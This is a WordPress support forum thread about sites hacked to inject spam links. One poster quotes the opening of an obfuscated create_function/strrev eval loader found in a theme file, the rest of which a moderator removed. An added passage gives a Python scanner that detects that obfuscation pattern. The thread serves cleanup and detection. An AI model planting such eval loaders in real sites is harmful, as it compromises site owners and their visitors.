• I have seen a number of sites with [ redacted ] URL embedded in the code. Generally after a link. One strange thing I noticed: it is also present in the robots.txt of all of these sites as well.

    I have searched all the files on the affected site without any luck.

    I see it has affected around 6,000+ WordPress sites according to Google.

    Does anyone have a clue where this is coming from?

Viewing 15 replies - 1 through 15 (of 18 total)
  • Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    If that’s happening to your site then you need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Anything less will probably result in the hacker walking straight back into your site again.

    Additional Resources:
    Hardening WordPress
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

    I see it has affected around 6,000+ WordPress sites according to Google.

    Sadly many people do not secure their WordPress sites or run on insecure hosts. It happens: you can lead them to water but you just can’t make them drink. 😉

    Thread Starter ey3wp

    (@ey3wp)

    Thanks for the advice.

    I have been through all of the resources. Scanned all the site files looking for changes. Run appropriate security etc.

    I have a feeling that it is coming via a compromised plugin. But I can't tell which one.

    Hi guys,

    Had the same problem with a client site as “ey3wp” and this is where the problem was:

    I found this code at the very top of my functions.php file inside my active theme’s folder:
    `<?php $wp_function_initialize = create_function('$a',strrev(';)a$(lave')); $wp_function_initialize(strrev(';))`

    [hacked code removed – please do not post that here]

    Taking that out took care of the “cash advance” links being inserted on the fly into the content on every page.

    However, there must be a security hole somewhere, so I am not done fighting yet 🙁

    The site runs on WP 3.4 and is hosted on GoDaddy.

    Hope this helps.
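
As an added example (not part of the original thread and not code from any poster): a small Python scanner for the pattern described in the post above, a `create_function` call combined with a `strrev`-reversed string that hides `eval`. The function names, the list of flagged PHP functions and the sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# PHP functions worth flagging when their name only appears inside a reversed literal
DANGEROUS = ("eval", "assert", "base64_decode", "gzinflate", "str_rot13")
STRING_LITERAL = re.compile(r"""(['"])(.*?)\1""", re.S)

def scan_php_source(text):
    """Return a sorted list of findings for the contents of one PHP file."""
    # Forum and CMS software often turns straight quotes into typographic ones
    text = text.translate({0x2018: "'", 0x2019: "'", 0x201C: '"', 0x201D: '"'})
    findings = set()
    if re.search(r"\bcreate_function\s*\(", text):
        findings.add("create_function call")
    if re.search(r"\bstrrev\s*\(", text):
        # Reverse every quoted literal and look for a hidden function call
        for _, literal in STRING_LITERAL.findall(text):
            reversed_literal = literal[::-1]
            for name in DANGEROUS:
                if re.search(r"\b%s\s*\(" % name, reversed_literal):
                    findings.add("reversed string hides %s()" % name)
    return sorted(findings)

def scan_tree(root):
    """Map each flagged .php file under root to its list of findings."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples: one with the obfuscation pattern, one ordinary theme line
SAMPLE_INFECTED = "<?php $f = create_function('$a', strrev(';)a$(lave')); $f('');"
SAMPLE_CLEAN = "<?php add_action('init', 'mytheme_setup'); echo strrev('abc');"

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_INFECTED))
    print(scan_php_source(SAMPLE_CLEAN))
```

A hit only locates one injected snippet; as the later replies point out, removing it does not close whatever let the attacker write to the file.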

    The site runs on WP 3.4

    Running an old version of WP is a security risk – and possibly why your site was hacked. You really should get and keep that updated.

    Also note that posting hacked code on these forums is not good – if you want to post it someplace, use a pastebin and post the link.

    WPyogi,
    I know the site should be updated but I can only advise. Now, they will probably want to do so 😉

    Sorry about the code, I didn’t know. But if it doesn’t execute then what is the problem?

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Sorry about the code, I didn’t know. But if it doesn’t execute then what is the problem?

    The problem is we do not give air time to malware code or the spammy links that often accompany that code. 😉

    Seriously, sharing malware code here is not allowed. There is just never any good reason to post that.

    Jan, what a noble cause but I have to disagree 🙂

    Here is my reason:

    I posted this code because that’s how I was able to solve my problem. In comments on a blog post about a similar issue someone posted the code. With that info available, I was able to run “Find and replace” on the whole WP site. And bingo I found where the malicious code was.

    And since I was reading this thread I thought it might help someone else the same way because the guy that started this thread has the same problem as me.

    If this is not a good enough reason to post such a code then probably you are right – “There is just never any good reason to post that.”

    Not all of us are geeks, so sometimes a concrete example helps a lot 😉

    Unfortunately, your code could essentially infect the site. Putting those trying to help you in the path of malware isn’t cool. Drugs aren’t cool either.

    Security holes are all over the place. Even if they don’t seem to exist in the latest releases of plugins and the WordPress platform, someone, somewhere is looking for a way in to your site. That’s why WordPress has standard URLs for cleaning your site, rather than finding the problem. While a professional can probably help you SOMEWHAT find the cause to an infection, it spreads so fast because users fail to secure their sites, making it almost impossible to be certain of the cause. The best we can do as the community trying to help you is offer solutions.

    Sorry for posting the code, I didn’t know. Sorry. But you don’t have to be all over me 😉

    I was trying to help the community by providing what I deleted from where. I never claimed that fixes the security hole, all I claimed was… well you can read above.

    And if a client doesn’t want to pay me to update when I advise then I am not going to keep up with their website for free.

    Sorry and thanks 😉

    Besides, could you be more concrete about “standard URLs for cleaning”.

    Thank you.

    And I just got an email from a client wanting to update and do all that is necessary. I guess they got scared enough.

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Jan, what a noble cause but I have to disagree 🙂

    It’s good to disagree and smile. 😀

    Not all of us are geeks, so sometimes a concrete example helps a lot 😉

    …You didn’t actually read those articles I posted 2 days ago, right…?

    Taking that out took care of the “cash advance” links being inserted on the fly into the content on every page.

    Here’s the real problem with your solution: search and replace does not fix it. Ever. Which you fully realize and understand:

    However, there must be a security hole somewhere, so I am not done fighting yet 🙁

    Posting malware code is like showing people how your car was before you fixed it. It’s not valuable, it often contains spammy links, and you do not ever need to share that here.

    Also? If you do not know what you are doing you could be giving people who know even less information that could harm their installations.

    If you want to help people you can describe what steps you did, not what it was you did it to. There are plenty of places to view malware code but these forums are not one of them.

    Sorry.

    I know half-ways what I am doing in terms of security.

    I didn’t read all of your links.

    I know the search and replace fixed the symptoms only.

    Thank you for the advice.

    I am somewhat confused about this issue. What exactly is the hack you're experiencing?

    [links removed – please do not post links to your site in your posts – these forums are not for soliciting work in any way – see:
    http://codex.wordpress.org/Forum_Welcome#Helping_Out]

  • The topic ‘web site hacked expolit’ is closed to new replies.